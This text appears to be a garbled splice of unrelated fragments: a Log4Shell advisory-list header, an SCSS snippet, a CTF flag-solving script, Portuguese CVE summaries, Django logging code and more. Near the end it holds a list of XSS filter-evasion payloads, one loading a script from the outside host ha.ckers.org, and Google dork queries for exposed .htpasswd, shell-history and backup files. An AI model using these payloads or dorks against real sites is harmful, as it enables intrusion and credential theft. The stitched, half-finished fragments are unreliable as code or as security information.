KTZgraph

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

If you want to add a link, comment or send it to me
Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Royce Williams list sorted by vendors responses Royce List
Very detailed list NCSC-NL
The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List

Every block should be in separated file named as block.

Filename: rating-star.scss

.rating-star {
    $font-size: 0.5em;
    
    display: inline-block; // `display` style may be set freely

	from Crypto.Util.number import *
	# calculate the solution to 2^10000 * x = 1002773875431658367671665822006771085816631054109509173556585546508965236428620487083647585179992085437922318783218149808537210712780660412301729655917441546549321914516504576 mod 5^174
	R.<x> = PolynomialRing(Integers(5^174), implementation='NTL')
	f = 2^10000 * x - 1002773875431658367671665822006771085816631054109509173556585546508965236428620487083647585179992085437922318783218149808537210712780660412301729655917441546549321914516504576
	print(f.monic())
	flag = R(-40911366519048706766028794026595817244329662170458953600729420435667708075268681595360226681630085247360526719063455282924)
	print(flag)
	flag = long_to_bytes(850582076141850204917088272646087112157789081182432304925852879338520690155230258866308530234671754970789752036398232701)
	print(flag)

	CVE -2018-18405:
	O jQuery v2.2.2 permite o XSS por meio de um atributo onerror criado de um elemento IMG.
	Reference: https://owasp.org/www-community/attacks/xss/ -
	https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/ -
	https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md -


	CVE-2019-19517:
	Os dispositivos Intelbras RF1200 1.1.3 permitem que o CSRF faça a autenticação no
	login.html sem a necessidade de acessar a interface de login, possibilitando força bruta e

	Description: JYaml through 1.3 allows remote code execution during deserialization of a malicious payload through the load() function. NOTE: this is a discontinued product.

	VulnerabilityType: CWE-502: Deserialization of Untrusted Data

	Vendor of Product: http://jyaml.sourceforge.net (see yaml.org)

	Affected Product Code Base: jyaml Java library

	Attack Type: Remote

	from __future__ import unicode_literals
	import logging

	# built-in attributes on LogRecord. Used to determine what is passed in `extras`
	RESERVED_ATTRS = (
	'args', 'asctime', 'created', 'exc_info', 'exc_text', 'filename',
	'funcName', 'levelname', 'levelno', 'lineno', 'module',
	'msecs', 'message', 'msg', 'name', 'pathname', 'process',
	'processName', 'relativeCreated', 'stack_info', 'thread', 'threadName')

	import logging.config
	import os
	from django.utils.log import DEFAULT_LOGGING

	# Disable Django's logging setup
	LOGGING_CONFIG = None

	LOGLEVEL = os.environ.get('LOGLEVEL', 'info').upper()

	logging.config.dictConfig({

	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>

	intitle:index.of .bash_history
	intitle:index.of .sh_history
	intitle:"Index of" index.html.bak
	intitle:"Index of" index.php.bak
	intitle:"Index of" index.jsp.bak
	intitle:"Index of" ".htpasswd" htpasswd.bak
	inurl:backup intitle:index.of inurl:admin
	"Index of /backup"
	intitle:"Index of" index.html~
	intitle:"Index of" index.php~